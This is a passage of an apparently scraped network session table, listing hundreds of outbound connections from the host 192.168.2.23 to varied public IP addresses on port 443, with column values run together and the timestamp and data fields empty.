                                          11542192.168.2.2354876130.177.132.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11543192.168.2.235630276.208.49.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11544192.168.2.2346464184.150.182.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11545192.168.2.2354978186.145.20.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11546192.168.2.2346206147.35.25.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11547192.168.2.2344326169.18.63.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11548192.168.2.2357232164.126.174.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11549192.168.2.23373469.84.236.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11550192.168.2.2352424132.11.179.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11551192.168.2.2336432209.72.197.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11552192.168.2.233295260.175.142.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11553192.168.2.233794212.23.242.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11554192.168.2.2348736132.116.89.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11555192.168.2.2349342176.160.133.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11556192.168.2.233713863.164.250.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11557192.168.2.2339418106.130.4.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11558192.168.2.235418267.247.74.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11559192.168.2.23344968.236.125.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11560192.168.2.2349472219.41.236.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11561192.168.2.2334922122.240.135.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11562192.168.2.2356662103.77.186.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11563192.168.2.234348091.134.151.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11564192.168.2.2358934153.202.119.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11565192.168.2.234834036.202.78.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11566192.168.2.2357226209.83.83.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11567192.168.2.2334956199.254.96.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11568192.168.2.23468662.224.47.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11569192.168.2.233901060.21.164.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11570192.168.2.233294234.3.127.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11571192.168.2.23483924.66.33.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11572192.168.2.2332872207.44.154.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11573192.168.2.2340392103.133.14.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11574192.168.2.233940434.141.117.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11575192.168.2.234712874.213.207.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11576192.168.2.2347368107.130.113.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11577192.168.2.2342686165.79.98.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11578192.168.2.235117424.151.58.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11579192.168.2.234433647.166.168.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11580192.168.2.233765666.150.41.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11581192.168.2.235441244.13.137.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11582192.168.2.234440067.224.27.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11583192.168.2.234368036.247.25.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11584192.168.2.2343850110.152.133.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11585192.168.2.2343828170.197.203.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11586192.168.2.2350504165.15.144.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11587192.168.2.2352814189.190.140.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11588192.168.2.235820037.236.53.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11589192.168.2.2346950113.250.5.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11590192.168.2.234875436.54.251.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11591192.168.2.2348698206.220.131.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11592192.168.2.2337396158.129.19.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11593192.168.2.233983020.81.201.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11594192.168.2.236091427.109.43.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11595192.168.2.2353318149.26.63.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11596192.168.2.233298824.4.211.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11597192.168.2.2354882154.131.147.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11598192.168.2.2349330176.157.193.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11599192.168.2.2334218113.199.92.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11600192.168.2.235083077.81.131.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11601192.168.2.233329461.209.204.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11602192.168.2.233587044.203.86.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11603192.168.2.2348658141.5.28.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11604192.168.2.2334576184.119.142.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11605192.168.2.2353464223.208.191.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11606192.168.2.2345878146.229.10.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11607192.168.2.2337298202.136.239.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11608192.168.2.235554418.50.188.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11609192.168.2.233624283.203.177.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11610192.168.2.2341506171.246.201.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11611192.168.2.2342616110.44.173.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11612192.168.2.2359938133.159.35.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11613192.168.2.2337762211.81.169.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11614192.168.2.235772474.136.49.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11615192.168.2.235530031.218.223.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11616192.168.2.2347110181.121.137.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11617192.168.2.2346722138.246.78.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11618192.168.2.2348148116.25.173.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11619192.168.2.234564289.171.227.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11620192.168.2.2333892193.83.253.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11621192.168.2.2357726204.28.109.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11622192.168.2.233648289.168.131.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11623192.168.2.2349608196.45.113.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11624192.168.2.2356922182.143.79.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11625192.168.2.23367884.38.228.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11626192.168.2.235330663.34.1.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11627192.168.2.233673483.171.163.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11628192.168.2.234002846.135.19.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11629192.168.2.2333254206.149.130.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11630192.168.2.2335410188.194.26.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11631192.168.2.2360620218.141.81.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11632192.168.2.234793435.126.84.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11633192.168.2.234511823.233.240.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11634192.168.2.2352630221.142.229.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11635192.168.2.2345676123.102.17.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11636192.168.2.233350898.164.214.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11637192.168.2.2345752211.104.214.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11638192.168.2.234408097.246.60.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11639192.168.2.234944441.184.223.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11640192.168.2.2360058139.44.206.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11641192.168.2.2349538177.148.90.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11642192.168.2.2344498148.151.110.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11643192.168.2.2336610107.62.2.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11644192.168.2.2337610217.151.78.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11645192.168.2.2344684195.126.59.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11646192.168.2.2360772212.14.51.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11647192.168.2.234010248.3.154.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11648192.168.2.234090212.193.225.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11649192.168.2.2349598177.111.63.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11650192.168.2.2341260195.9.161.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11651192.168.2.2340354120.79.163.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11652192.168.2.2349664179.188.58.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11653192.168.2.2335816185.33.86.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11654192.168.2.2351162116.68.32.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11655192.168.2.2340628115.175.186.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11656192.168.2.2345230117.209.5.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11657192.168.2.235387875.107.93.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11658192.168.2.235172841.183.189.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11659192.168.2.2339858107.146.78.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11660192.168.2.2347584157.126.99.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11661192.168.2.233608087.64.251.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11662192.168.2.2343478165.207.232.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11663192.168.2.2338728145.68.122.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11664192.168.2.2344284139.210.82.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11665192.168.2.2358338102.44.198.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11666192.168.2.2359470187.125.57.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11667192.168.2.2342454122.140.198.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11668192.168.2.2340876157.239.119.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11669192.168.2.2336292222.224.210.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11670192.168.2.2335594146.26.123.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11671192.168.2.23328429.210.193.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11672192.168.2.2339670222.63.136.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11673192.168.2.2358596110.183.87.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11674192.168.2.2351682183.6.101.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11675192.168.2.235886019.142.22.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11676192.168.2.234469241.50.173.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11677192.168.2.2336700207.91.100.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11678192.168.2.23440765.226.208.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11679192.168.2.235606082.52.139.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11680192.168.2.233792280.74.215.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11681192.168.2.2355124177.82.162.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11682192.168.2.2334898188.231.246.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11683192.168.2.2334860131.94.125.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11684192.168.2.234163054.186.150.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11685192.168.2.2360596207.226.149.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11686192.168.2.2343428198.6.103.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11687192.168.2.235743245.164.241.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11688192.168.2.2337426205.206.52.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11689192.168.2.235542459.25.136.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11690192.168.2.23558429.189.165.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11691192.168.2.2334390165.12.240.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11692192.168.2.2342686206.15.215.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11693192.168.2.2353042206.183.34.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11694192.168.2.234233467.23.165.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11695192.168.2.2334632164.232.229.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11696192.168.2.2354122193.219.138.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11697192.168.2.2334676206.48.160.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11698192.168.2.2339696144.25.224.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11699192.168.2.2336186135.117.71.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11700192.168.2.234613838.238.120.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11701192.168.2.2356420216.93.185.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11702192.168.2.2347544217.195.10.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11703192.168.2.2354846151.15.59.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11704192.168.2.235858097.62.41.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11705192.168.2.234134061.48.43.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11706192.168.2.235359231.51.2.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11707192.168.2.2343552144.153.163.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11708192.168.2.2355658101.134.210.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11709192.168.2.2349776160.15.90.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11710192.168.2.23414725.89.242.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11711192.168.2.236004643.70.107.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11712192.168.2.2355566199.155.74.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11713192.168.2.235641283.188.190.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11714192.168.2.2347642102.134.29.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11715192.168.2.2359524153.14.187.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11716192.168.2.233286088.134.246.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11717192.168.2.233404472.193.147.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11718192.168.2.2338956206.205.121.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11719192.168.2.2335300136.51.197.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11720192.168.2.233663090.126.83.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11721192.168.2.2334190218.126.28.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11722192.168.2.234220493.228.186.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11723192.168.2.234797099.7.37.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11724192.168.2.2336918151.58.74.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11725192.168.2.2354080137.7.163.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11726192.168.2.234315278.204.176.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11727192.168.2.2357754188.37.68.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11728192.168.2.235477266.142.254.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11729192.168.2.2341716212.137.128.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11730192.168.2.2341292202.40.229.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11731192.168.2.235571839.248.92.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11732192.168.2.2341050112.81.5.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11733192.168.2.235937069.4.251.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11734192.168.2.234834875.128.235.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11735192.168.2.235701624.146.203.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11736192.168.2.2360302193.106.232.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11737192.168.2.2344284135.170.154.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11738192.168.2.2337620140.138.41.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11739192.168.2.235273654.129.187.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11740192.168.2.2335864167.113.8.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11741192.168.2.2341990108.94.216.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11742192.168.2.2353068107.156.107.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11743192.168.2.233581636.10.232.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11744192.168.2.2340086180.20.130.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11745192.168.2.234111076.240.238.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11746192.168.2.2338176180.109.125.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11747192.168.2.234940214.235.144.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11748192.168.2.2358386152.119.123.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11749192.168.2.2354376222.138.174.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11750192.168.2.2354274217.135.65.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11751192.168.2.2335338107.126.76.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11752192.168.2.2354014205.199.107.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11753192.168.2.2351768197.133.179.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11754192.168.2.234914063.31.204.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11755192.168.2.233909613.37.183.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11756192.168.2.2333668207.180.161.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11757192.168.2.236054684.15.237.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11758192.168.2.235655665.229.165.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11759192.168.2.234281695.48.174.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11760192.168.2.2340176107.34.80.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11761192.168.2.235217046.11.50.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11762192.168.2.234364880.155.107.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11763192.168.2.2343998198.204.20.105443
                                          TimestampBytes transferredDirectionData


